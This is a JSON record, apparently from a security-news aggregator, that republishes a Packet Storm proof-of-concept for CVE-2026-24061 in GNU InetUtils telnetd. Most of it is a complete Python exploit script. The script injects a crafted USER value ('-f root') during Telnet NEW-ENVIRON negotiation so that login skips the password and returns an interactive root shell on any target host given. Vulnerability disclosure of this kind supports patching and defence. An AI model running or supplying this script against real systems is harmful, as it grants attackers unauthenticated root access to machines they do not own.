{“lastseen”:”2026-05-05T21:31:22″,”description”:”GNU InetUtils versions 2.0 through 2.6 telnetd remote privilege escalation proof of concept exploit…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:220370″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24061″],”sourceData”:”# Exploit Title: GNU InetUtils telnetd – Remote Privilege Escalation \\n # Date: 2026-01-24\\n # Exploit Author: Ali Guliyev (infat0x)\\n # Author GitHub: https:\/\/github.com\/infat0x\\n # Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/\\n # Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/\\n # Version: GNU InetUtils 2.0 through 2.6\\n # Tested on: Linux (various distributions using vulnerable inetutils-telnetd)\\n # CVE : CVE-2026-24061\\n \\n import socket\\n import sys\\n import threading\\n import argparse\\n import re\\n \\n \\”\\”\\”\\n Description:\\n The telnetd implementation in GNU InetUtils before 2.7-2 is vulnerable to \\n authentication bypass via environment variable injection. By passing a \\n crafted USER environment variable (e.g., \\”-f root\\”) during the Telnet \\n NEW-ENVIRON subnegotiation, an attacker can force the login process \\n to grant a root shell without requiring a password.\\n \\n Technical Analysis:\\n The vulnerability exists because telnetd fails to sanitize the USER variable \\n before passing it as an argument to \/bin\/login. By prepending the -f flag, \\n the login utility skips the authentication phase.\\n \\”\\”\\”\\n \\n # Telnet Protocol Constants (RFC 854)\\n IAC = 255 # Interpret As Command\\n DONT = 254\\n DO = 253\\n WONT = 252\\n WILL = 251\\n SB = 250 # Subnegotiation Begin\\n SE = 240 # Subnegotiation End\\n \\n # Telnet Option Codes (RFC 1572)\\n NEW_ENVIRON = 39 \\n IS = 0\\n VAR = 0\\n VALUE = 1\\n \\n def handle_negotiation(sock, cmd, opt):\\n \\”\\”\\”Responds to standard Telnet negotiation sequences.\\”\\”\\”\\n if cmd == DO and opt == NEW_ENVIRON:\\n # Agreement to use the environment variable passing option\\n sock.sendall(bytes([IAC, WILL, NEW_ENVIRON]))\\n elif cmd == DO:\\n # Refuse other options for simplicity\\n sock.sendall(bytes([IAC, WONT, opt]))\\n elif cmd == WILL:\\n # Acknowledge the server’s willingness\\n sock.sendall(bytes([IAC, DO, opt]))\\n \\n def handle_subnegotiation(sock, sb_data, user_payload):\\n \\”\\”\\”Executes the core exploit by injecting the malformed USER variable.\\”\\”\\”\\n if len(sb_data) \\u003e 0 and sb_data[0] == NEW_ENVIRON:\\n # Format: IAC SB NEW_ENVIRON IS VAR \\”USER\\” VALUE \\”-f root\\” IAC SE\\n env_msg = (\\n bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + \\n b’USER’ + \\n bytes([VALUE]) + \\n user_payload.encode(‘ascii’) + \\n bytes([IAC, SE])\\n )\\n sock.sendall(env_msg)\\n \\n def process_telnet_stream(data, sock, user_payload):\\n \\”\\”\\”Parses incoming data to separate control signals from actual text.\\”\\”\\”\\n clean_output = b”\\n i = 0\\n while i \\u003c len(data):\\n if data[i] == IAC and i + 1 \\u003c len(data):\\n cmd = data[i + 1]\\n if cmd in [DO, DONT, WILL, WONT] and i + 2 \\u003c len(data):\\n handle_negotiation(sock, cmd, data[i + 2])\\n i += 3\\n elif cmd == SB:\\n se_idx = i + 2\\n while se_idx \\u003c len(data) – 1:\\n if data[se_idx] == IAC and data[se_idx + 1] == SE:\\n break\\n se_idx += 1\\n if se_idx \\u003c len(data) – 1:\\n handle_subnegotiation(sock, data[i + 2:se_idx], user_payload)\\n i = se_idx + 2\\n else:\\n i += 1\\n else:\\n i += 2\\n else:\\n clean_output += bytes([data[i]])\\n i += 1\\n \\n # Filter ANSI escape sequences for a cleaner shell experience\\n ansi_escape = re.compile(rb’\\\\x1b\\\\[[0-?]*[ -\/]*[@-~]’)\\n return ansi_escape.sub(b”, clean_output)\\n \\n def socket_reader_thread(sock, user_payload):\\n \\”\\”\\”Background thread to handle server output.\\”\\”\\”\\n try:\\n while True:\\n raw_data = sock.recv(4096)\\n if not raw_data:\\n break\\n display_data = process_telnet_stream(raw_data, sock, user_payload)\\n if display_data:\\n sys.stdout.buffer.write(display_data)\\n sys.stdout.buffer.flush()\\n except (ConnectionResetError, BrokenPipeError):\\n pass\\n finally:\\n print(\\”\\\\n[*] Connection closed.\\”)\\n \\n def main():\\n parser = argparse.ArgumentParser(description=\\”CVE-2026-24061 Exploitation Tool\\”)\\n parser.add_argument(‘host’, help=\\”Target IP address\\”)\\n parser.add_argument(‘-p’, ‘–port’, type=int, default=23, help=\\”Telnet port (default 23)\\”)\\n args = parser.parse_args()\\n \\n # The exploit payload to bypass login\\n user_payload = \\”-f root\\”\\n \\n try:\\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n client_sock.settimeout(5)\\n client_sock.connect((args.host, args.port))\\n client_sock.settimeout(None)\\n print(f\\”[*] Connected to {args.host}:{args.port}\\”)\\n print(f\\”[*] Sending payload: {user_payload}\\”)\\n except Exception as e:\\n print(f\\”[!] Connection failed: {e}\\”)\\n sys.exit(1)\\n \\n # Launch output listener\\n threading.Thread(target=socket_reader_thread, args=(client_sock, user_payload), daemon=True).start()\\n \\n print(\\”[*] Interactive session started. Type commands below.\\\\n\\”)\\n try:\\n while True:\\n # Simple interactive shell loop\\n char = sys.stdin.read(1)\\n if not char:\\n break\\n client_sock.sendall(char.encode())\\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Exploit session terminated by user.\\”)\\n finally:\\n client_sock.close()\\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220370″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220370\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T21:31:22″,”description”:”GNU InetUtils versions 2.0 through 2.6 telnetd remote privilege escalation proof of concept exploit…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GNU InetUtils telnetd Remote Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:220370″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24061″],”sourceData”:”# Exploit Title: GNU InetUtils telnetd…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-51566","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n